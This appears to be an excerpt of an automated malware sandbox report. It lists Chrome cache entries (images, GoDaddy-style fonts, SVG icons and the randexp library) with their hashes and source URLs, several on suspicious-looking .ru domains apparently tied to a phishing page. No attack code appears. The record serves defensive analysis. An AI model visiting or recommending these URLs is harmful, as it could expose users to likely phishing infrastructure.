                                                                          Preview:RIFF....WEBPVP8X....0...k.....ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPHX.....\m{.z..........T ..Q....R..*.X....U`..@......Yyy..<q.."b..a....K._.....jH.*...}q..........^.-.\.4. &.H~.q..H.q.'.t..p....0)...X.....8./.... ..6.#H..Y..../...E>.#.tv....9.\.p5......h......1.{@.k].(1...B.........u.n....=....sX...*..I.c]r....S.....u.a...X.....Pi..q.$73..ga..h%9.S.l.....}....^%.@:Q....we8x..j..3.^.}5.fFtZ...3....<. x.s....d@(./.<].y...m.....T..........T.P`....5..<qYl.g..k..N. `_...f....yN.R.PB..p|..-.%.`y.._.]C.v.<.Y...V..I..(.c....>...........k....nt

                                                                          Chrome Cache Entry: 89

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:very short file (no magic)
                                                                          Category:downloaded
                                                                          Size (bytes):1
                                                                          Entropy (8bit):0.0
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                          SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                          SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                          SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://xzes.kdyukk.ru/jawari!xpna2
                                                                          Preview:0

                                                                          Chrome Cache Entry: 90

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                          Category:downloaded
                                                                          Size (bytes):892
                                                                          Entropy (8bit):5.863167355052868
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:41D62CA205D54A78E4298367482B4E2B
                                                                          SHA1:839AAE21ED8ECFC238FDC68B93CCB27431CD5393
                                                                          SHA-256:20A4A780DB0BCC047015A0D8037EB4EB58B3E5CB338673799C030A3E1B626B40
                                                                          SHA-512:82B9806490A0DB493DA16466738437B9BB54B979075DB58C89CA0D192D780DDB5ED888E10CE76A53D48D30D5013791CAC7AB468D85B61D32766140DD53DC9044
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://ldaqmiesa.fictiougbo.ru/qrd3XcgHAY2iNoCw03ad8wRPB3hghHyTZBXwAL2gJj5wQCEWF45131
                                                                          Preview:RIFFt...WEBPVP8X....0.../../..ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH=......m[..H.A.).U....A..C.u@. ....L.......;.....$3{2{....3..V6.i.W.F.h..ee^k.:..cl.Z.eb.....).IZ....!....;X.:&...hF0...kM......!W5.ak8.......#V.s...2...`..v...}.(0 p../s.'VS`SjX.B.,...v.#./I....}.b....^*1..k.:F9hgb.HgW.Q^.r}..Y5....'.JJ....&.."]<.M.Z)o.H..].i.H1..G.P>.b.{.G.\BYx*.[.y...?L....:.%.d......%.q..VP8 @...0....*0.0.>U .E..!.4.8.D...o..z...A....Z........?..z......k...

                                                                          Chrome Cache Entry: 91

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 43596, version 1.0
                                                                          Category:downloaded
                                                                          Size (bytes):43596
                                                                          Entropy (8bit):7.9952701440723475
                                                                          Encrypted:true
                                                                          SSDEEP:
                                                                          MD5:2A05E9E5572ABC320B2B7EA38A70DCC1
                                                                          SHA1:D5FA2A856D5632C2469E42436159375117EF3C35
                                                                          SHA-256:3EFCB941AADDAF4AEA08DAB3FB97D3E904AA1B83264E64B4D5BDA53BC7C798EC
                                                                          SHA-512:785AB5585B8A9ED762D70578BF13A6A69342441E679698FD946E3616EF5688485F099F3DC472975EF5D9248AFAAD6DA6779813B88AA1DB60ABE2CC065F47EB5F
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://ldaqmiesa.fictiougbo.ru/GDSherpa-vf.woff2
                                                                          Preview:wOF2.......L.......P..............................U...z...?HVAR.;?MVARF.`?STAT...H/L.....@..P..>.0....6.$..x. .....{[.q....Rl....t..~v....(....T.t.;..n'..v=....?...l].xI...m."..?hNX.,...8.;G...m,}.h.>(=[...m/.>....8&f..&.......].u...&.VD..].<..yR.eb<,x......)..c..t...k...9..o.T..R9..kq..TR%U..v....r._......D...f..=qH...8.<...x..(V.I.h.L3*#]8...-.z.........3.9V..........u.........x.....S_...\1...&6...j^...c;()m.J.....>....xz..Y...|.7......!.jw...,.L.;N.......n......].....8].R..d.....`.R.B..#..,...1R.UJD..b.`.0<....FA=..{.....`....c...R..Uy..J.k.".j..N.{w..UT<.8T66...H,...FH.GS.G.]......?.T.!4..8...B...l.p@.......t.o...v...b.g..?..m..!.%.....x..MC1M...........k...})..+N.....Q_yS.X.11a....&`..'".xZ..=b^...iD...} .. ..b...}DIvu.q....k.4.....@.....P*..j..)..'.L......b..RQjI*I..Qk.T.l._wO..$....!c..%.{.._N..E@....A...?...aW.y.gf.g.&E... ~.x.b....b...~......f/.....G....J.6.y.....zE@T.a.0^Ul......S:..,..}..B.R..Rt~.v...L:`4.IKA..V...x&@...h.7.P.....*.

                                                                          Chrome Cache Entry: 92

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 28584, version 1.66
                                                                          Category:downloaded
                                                                          Size (bytes):28584
                                                                          Entropy (8bit):7.992563951996154
                                                                          Encrypted:true
                                                                          SSDEEP:
                                                                          MD5:17081510F3A6F2F619EC8C6F244523C7
                                                                          SHA1:87F34B2A1532C50F2A424C345D03FE028DB35635
                                                                          SHA-256:2C7292014E2EF00374AEB63691D9F23159A010455784EE0B274BA7DB2BCCA956
                                                                          SHA-512:E27976F77797AD93160AF35714D733FD9E729A9981D8A6F555807981D08D8175E02692AA5EA6E59CEBD33895F5F6A3575692565FDD75667630DAB158627A1005
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://ldaqmiesa.fictiougbo.ru/GDSherpa-regular.woff2
                                                                          Preview:wOF2......o.......6x..oG...B.......................>....`..<.<..b.....h..B.6.$..x..>.. ..'..{...[x"q..].....hJ....'.......6.2.[....q....z..mCww...*.eU..S.........0..S.s..,....\.e..F.&....oU*R.}Q.C..2.TD....5..#..h.H.2.|<.1.z..].xZ...z..z..W.........p%..F.e.r"yG.......f.M3.].U.p...E..<..:..j..E......t....!....~a...J.m....f.d.eE..>.:.9.....,6K{.q..6e..4:z......{.{....$.. ...B....9:0.G..6.9R....m..jCW.m.]:{.p..?P.O.B..E....u.J.._..........dd=. l..SJ..fjm....\....)...6......mV.`.J.R.A..R.....J...T.y.........m...k-....{'.Ud"...C.$d*.N 9}.N]..2p.q.T..6.-A.U...."..o.\......uh...$..4j..v...9....anl/NT....K....k..A...........U5S.=.t[.)/s.R.......F..)6H A..'?!....7S.....w:.%.H.@...l?...lm..lUd D...-.... .......5).`..w&..Q....-.. ...9.Xt./SQ?.s+u.9..\.h.l.G.#.*..#@.F..f.1.f..=`....p.....=c..f=..p 4By.u.z'...$;.s.....z.....X..n6y-...........<.......X......~+j.z.j.......7.PD..O..w..9..8].!~C&.......*LCE..Nf~.N.eJ.iXnX*C.&....t.U..Nr.@..lZ.... .X..

                                                                          Chrome Cache Entry: 93

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:dropped
                                                                          Size (bytes):270
                                                                          Entropy (8bit):4.840496990713235
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:40EB39126300B56BF66C20EE75B54093
                                                                          SHA1:83678D94097257EB474713DEC49E8094F49D2E2A
                                                                          SHA-256:765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
                                                                          SHA-512:9C9CD1752A404E71772003469550D3B4EFF8346A4E47BE131BB2B9CB8DD46DBEF4863C52A63A9C63989F9ABEE775CB63C111ADD7AFA9D4DFC7A4D95AE30F9C6E
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fill="#262626"/></svg>

                                                                          Chrome Cache Entry: 94

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:dropped
                                                                          Size (bytes):7390
                                                                          Entropy (8bit):4.02755241095864
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:B59C16CA9BF156438A8A96D45E33DB64
                                                                          SHA1:4E51B7D3477414B220F688ADABD76D3AE6472EE3
                                                                          SHA-256:A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
                                                                          SHA-512:2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14

                                                                          Chrome Cache Entry: 99

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (10017)
                                                                          Category:downloaded
                                                                          Size (bytes):10245
                                                                          Entropy (8bit):5.437589264532084
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:6C20A2BE8BA900BC0A7118893A2B1072
                                                                          SHA1:FF7766FDE1F33882C6E1C481CEED6F6588EA764C
                                                                          SHA-256:B1C42ACD0288C435E95E00332476781532ED002CAC6F3DCEE9110CED30B31500
                                                                          SHA-512:8F80AD8ADC44845D24E13D56738A2CA2A73EE6FCDC187542BA4AAEBBF8817935D053A2ACFB0D425B9CC0C582B5091E1C9FE16B90B3AA682187645067C267FC41
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://objects.githubusercontent.com/github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250325%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250325T173845Z&X-Amz-Expires=300&X-Amz-Signature=af31394ba4881913f262d030e5695fd0aa8434877ca5e77c597ea9c2bd2f1dbf&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream
                                                                          Preview://.// randexp v0.4.3.// Create random strings that match a given regular expression..//.// Copyright (C) 2016 by Roly Fentanes (https://github.com/fent).// MIT License.// http://github.com/fent/randexp.js/raw/master/LICENSE .//.!function(){var e="RandExp",t=function(){return function e(t,n,r){function o(s,i){if(!n[s]){if(!t[s]){var u="function"==typeof require&&require;if(!i&&u)return u(s,!0);if(a)return a(s,!0);var p=new Error("Cannot find module '"+s+"'");throw p.code="MODULE_NOT_FOUND",p}var h=n[s]={exports:{}};t[s][0].call(h.exports,function(e){var n=t[s][1][e];return o(n?n:e)},h,h.exports,e,t,n,r)}return n[s].exports}for(var a="function"==typeof require&&require,s=0;s<r.length;s++)o(r[s]);return o}({1:[function(e,t,n){function r(e){return e+(e>=97&&122>=e?-32:e>=65&&90>=e?32:0)}function o(){return!this.randInt(0,1)}function a(e){return e instanceof h?e.index(this.randInt(0,e.length-1)):e[this.randInt(0,e.length-1)]}function s(e){if(e.type===p.types.CHAR)return new h(e.value);if(e.

                                                                          Static File Info

                                                                          No static file info